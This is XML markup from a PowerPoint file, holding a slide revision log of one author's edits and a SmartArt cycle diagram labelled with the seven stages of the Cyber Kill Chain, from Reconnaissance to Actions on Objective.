          <ac:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T09:52:30.232" v="14909" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3534031669" sldId="1404"/>
            <ac:picMk id="5" creationId="{EF48ABB6-6805-863A-BFEB-79D10EB446A0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13:19:45.206" v="17152" actId="404"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="319218064" sldId="1405"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T10:27:18.890" v="14945" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="319218064" sldId="1405"/>
            <ac:spMk id="2" creationId="{8752AC9E-B920-37E5-D02F-87F10C863227}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T13:19:45.206" v="17152" actId="404"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="319218064" sldId="1405"/>
            <ac:spMk id="4" creationId="{97D4183A-F8B1-E90D-C544-5FC30677D196}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T10:26:07.669" v="14911" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1751340540" sldId="1405"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T10:40:54.489" v="15767" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3490340760" sldId="1406"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T10:39:51.530" v="15757" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3490340760" sldId="1406"/>
            <ac:spMk id="2" creationId="{F4B52D49-5204-9DD4-3483-3F029720B30A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T10:40:54.489" v="15767" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3490340760" sldId="1406"/>
            <ac:picMk id="5" creationId="{733C2A54-75A3-7228-1651-CC3D2B89DC73}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T10:40:45.833" v="15765" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3490340760" sldId="1406"/>
            <ac:picMk id="7" creationId="{C7739863-79F5-B771-D795-E02E7325A269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10:44:48.384" v="15916" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4002236241" sldId="1407"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T10:43:15.692" v="15781" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4002236241" sldId="1407"/>
            <ac:spMk id="2" creationId="{BCE594A3-1166-0A15-80E6-A853F51ACF6C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T10:44:13.526" v="15912" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4002236241" sldId="1407"/>
            <ac:spMk id="4" creationId="{9B28F0F2-6B0F-2839-14AC-9114C0CFE0D4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T10:44:48.384" v="15916" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4002236241" sldId="1407"/>
            <ac:picMk id="6" creationId="{19910677-12C9-ABEC-AFE0-91B3665E9C24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13:19:58.589" v="17154" actId="403"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="207639267" sldId="1408"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T10:45:27.389" v="15959" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="207639267" sldId="1408"/>
            <ac:spMk id="2" creationId="{8884855D-D745-347A-54CE-972CFB724CFA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T13:19:58.589" v="17154" actId="403"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="207639267" sldId="1408"/>
            <ac:spMk id="4" creationId="{85CEA8AD-31EB-6CED-A1C6-BDD96F0CDD11}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T11:00:23.672" v="16393" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1902735742" sldId="1409"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T10:59:47.081" v="16388" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1902735742" sldId="1409"/>
            <ac:spMk id="2" creationId="{1AC1E620-35AC-8112-A99D-52B0666D05F8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T11:00:20.176" v="16391" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1902735742" sldId="1409"/>
            <ac:spMk id="4" creationId="{36707F9E-D0AB-AC25-D6B8-3F1D169A37C5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T11:00:23.672" v="16393" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1902735742" sldId="1409"/>
            <ac:picMk id="6" creationId="{C6CB51BE-7E95-03A9-7948-8432C8D5F11A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T11:04:53.163" v="16893" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4034549708" sldId="1410"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T11:04:19.917" v="16870" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4034549708" sldId="1410"/>
            <ac:spMk id="2" creationId="{67D602A2-7B6A-AFA9-8CBF-6F3139F1DAB9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T11:04:32.486" v="16891" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4034549708" sldId="1410"/>
            <ac:spMk id="4" creationId="{208884DF-36F2-CC7F-18A1-9366CC19924D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T11:04:53.163" v="16893" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4034549708" sldId="1410"/>
            <ac:picMk id="6" creationId="{BB48AB84-4526-16B5-F808-8742CCCAE82D}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod ord">
        <pc:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T11:05:38.085" v="16941" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="859677366" sldId="1411"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T11:05:38.085" v="16941" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="859677366" sldId="1411"/>
            <ac:spMk id="7" creationId="{4C6A1E68-FD0B-2033-E039-4EB8045CE4DE}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T13:02:55.706" v="17130" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="736126743" sldId="1412"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T11:05:45.870" v="16955" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="736126743" sldId="1412"/>
            <ac:spMk id="2" creationId="{C5392C3E-E4AC-35E7-CF8C-48F846D483FF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Schlesinger, Sebastian" userId="d814e6c9-e9fb-4b77-84f7-ccd8aa3529bb" providerId="ADAL" clId="{3E99DC0F-4E20-4E22-A28D-675765467204}" dt="2023-04-19T13:02:55.706" v="17130" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="736126743" sldId="1412"/>
            <ac:spMk id="4" creationId="{93A791FD-E1D2-FCE6-E0E7-01131C59FBF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6B7D42-32C0-4DD8-8CA4-B79211159981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36C25F-92A2-4E53-8824-0700907674DA}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800"/>
            <a:t>Reconnaissance</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00A4F2EC-34B2-4D9F-AA1C-3F984FC5B196}" type="parTrans" cxnId="{E71D34BE-6F11-416A-AD12-3CD8DC9D0A84}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E75DCAA4-80C6-4461-9808-81196D93F68B}" type="sibTrans" cxnId="{E71D34BE-6F11-416A-AD12-3CD8DC9D0A84}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{10AF3A7E-C0E8-4B5A-BDAB-AC66FDE76920}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800"/>
            <a:t>Weaponization</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B0B4A931-ACFF-4C5C-90ED-2E85218F9197}" type="parTrans" cxnId="{6F833015-457A-4A30-B443-1755C662ED11}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BD40328C-EFB2-4304-89C8-9D2F7780F3F9}" type="sibTrans" cxnId="{6F833015-457A-4A30-B443-1755C662ED11}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C1AA5765-4E48-4F0D-9B62-520575F66BDA}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800"/>
            <a:t>Delivery</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BC1ED148-964D-4263-A2D5-98BE9538937A}" type="parTrans" cxnId="{0E099BA8-2381-4F61-AD22-A2D6F61D3AA3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DAB46487-768B-477C-AC01-C70F52985905}" type="sibTrans" cxnId="{0E099BA8-2381-4F61-AD22-A2D6F61D3AA3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7687006-8EC6-419D-91A4-5A53710E0290}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800"/>
            <a:t>Installation</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8DED5232-8DF2-484F-B7F2-5D58D18E4A1E}" type="parTrans" cxnId="{ABE720BA-7706-4D02-A776-A0015EF5DD02}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE6AA93D-95BB-48F7-8A99-99B9411E2445}" type="sibTrans" cxnId="{ABE720BA-7706-4D02-A776-A0015EF5DD02}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{509332C4-472B-4F69-89D6-EB035E21147D}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800"/>
            <a:t>Exploitation</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ECEF362E-5C12-4ABA-AE7F-0CFF364F3A40}" type="parTrans" cxnId="{81ED9FCE-619B-4EE9-8E50-1734E63D2A9F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FED38A34-03BB-4B82-B567-A41F0B50583F}" type="sibTrans" cxnId="{81ED9FCE-619B-4EE9-8E50-1734E63D2A9F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A00FB3D3-0A9F-4E2B-A501-2FC92637A08C}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800"/>
            <a:t>Command &amp; Control</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{978D5447-5D1A-40F6-BB70-67697A329B46}" type="parTrans" cxnId="{E3D63538-E6DE-4DD0-8EBF-59B55004FAE6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CF71AEC-FE93-4463-AE7D-DBEF6196B9EC}" type="sibTrans" cxnId="{E3D63538-E6DE-4DD0-8EBF-59B55004FAE6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4AA4EDB9-469F-493D-9213-10FBACC3EED8}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800"/>
            <a:t>Actions on Objective</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A933DF63-719B-4E59-A894-3802B885A089}" type="parTrans" cxnId="{6BCD6832-C15D-43DF-A1F8-D7A807C5C7FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D6AA18D3-2622-43DD-BF2B-73DA064A05EF}" type="sibTrans" cxnId="{6BCD6832-C15D-43DF-A1F8-D7A807C5C7FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3200"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1F1DEBA8-D443-49BD-9601-B8F2455A6437}" type="pres">
      <dgm:prSet presAssocID="{146B7D42-32C0-4DD8-8CA4-B79211159981}" presName="cycle" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D1C93BBA-FD51-4CEC-A16E-2191B990EE7B}" type="pres">
      <dgm:prSet presAssocID="{5A36C25F-92A2-4E53-8824-0700907674DA}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4F5C09C4-BEE7-4688-BF30-58E2C7BED38F}" type="pres">
      <dgm:prSet presAssocID="{5A36C25F-92A2-4E53-8824-0700907674DA}" presName="node" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="7" custScaleX="191835" custRadScaleRad="96607" custRadScaleInc="8585">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B54C72F4-0D83-4A51-A315-6C856AF8C3CE}" type="pres">
      <dgm:prSet presAssocID="{E75DCAA4-80C6-4461-9808-81196D93F68B}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1C64654E-6F5C-4A97-9A79-A09980D8D77F}" type="pres">
      <dgm:prSet presAssocID="{10AF3A7E-C0E8-4B5A-BDAB-AC66FDE76920}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BBDC83BC-83AE-47CB-A96E-1F7247EB63F6}" type="pres">
      <dgm:prSet presAssocID="{10AF3A7E-C0E8-4B5A-BDAB-AC66FDE76920}" presName="node" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="7" custScaleX="207112">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8C856DE0-6582-488A-B9D6-7866B9135E34}" type="pres">
      <dgm:prSet presAssocID="{BD40328C-EFB2-4304-89C8-9D2F7780F3F9}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3587C51B-1C0D-493D-8EEA-043C8E253F76}" type="pres">
      <dgm:prSet presAssocID="{C1AA5765-4E48-4F0D-9B62-520575F66BDA}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B3FE02C3-8765-4560-9AD3-F118D2CBEA96}" type="pres">
      <dgm:prSet presAssocID="{C1AA5765-4E48-4F0D-9B62-520575F66BDA}" presName="node" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8415F704-377D-45E8-B3A7-3B1128A7B574}" type="pres">
      <dgm:prSet presAssocID="{DAB46487-768B-477C-AC01-C70F52985905}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{02802196-9015-4BCD-BD9B-51E79264DB44}" type="pres">
      <dgm:prSet presAssocID="{509332C4-472B-4F69-89D6-EB035E21147D}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{857943C1-02D9-4588-B200-8F69BA265515}" type="pres">
      <dgm:prSet presAssocID="{509332C4-472B-4F69-89D6-EB035E21147D}" presName="node" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="7" custScaleX="163085" custRadScaleRad="91765" custRadScaleInc="-4093">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5C442F18-DDC4-4CAA-8FBD-4E2FF28BA77C}" type="pres">
      <dgm:prSet presAssocID="{FED38A34-03BB-4B82-B567-A41F0B50583F}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0EB5DE32-2675-4B51-9D23-ADB4F4DD9AC4}" type="pres">
      <dgm:prSet presAssocID="{C7687006-8EC6-419D-91A4-5A53710E0290}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{39B18046-95A2-426D-B929-94F60BF39549}" type="pres">
      <dgm:prSet presAssocID="{C7687006-8EC6-419D-91A4-5A53710E0290}" presName="node" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="7" custScaleX="165399">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0AF4AC1B-E06F-48E1-8BB4-EB0F1CC81997}" type="pres">
      <dgm:prSet presAssocID="{FE6AA93D-95BB-48F7-8A99-99B9411E2445}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7731624E-7D3B-4609-ADC3-5A505BC772F5}" type="pres">
      <dgm:prSet presAssocID="{A00FB3D3-0A9F-4E2B-A501-2FC92637A08C}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{22F48EE0-C090-408C-942B-72CC47DADE39}" type="pres">
      <dgm:prSet presAssocID="{A00FB3D3-0A9F-4E2B-A501-2FC92637A08C}" presName="node" presStyleLbl="revTx" presStyleIdx="5" presStyleCnt="7" custScaleX="182250">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4A2A1357-4F14-418A-BE0B-CC77B55B5D07}" type="pres">
      <dgm:prSet presAssocID="{6CF71AEC-FE93-4463-AE7D-DBEF6196B9EC}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{973104DE-32F5-4CA6-8035-3A26783D528C}" type="pres">
      <dgm:prSet presAssocID="{4AA4EDB9-469F-493D-9213-10FBACC3EED8}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0DD1A97F-4D88-4428-97AE-D0DC2CF76558}" type="pres">
      <dgm:prSet presAssocID="{4AA4EDB9-469F-493D-9213-10FBACC3EED8}" presName="node" presStyleLbl="revTx" presStyleIdx="6" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{149312C0-C957-49F9-BC52-7532C4D4544F}" type="pres">
      <dgm:prSet presAssocID="{D6AA18D3-2622-43DD-BF2B-73DA064A05EF}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="7"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
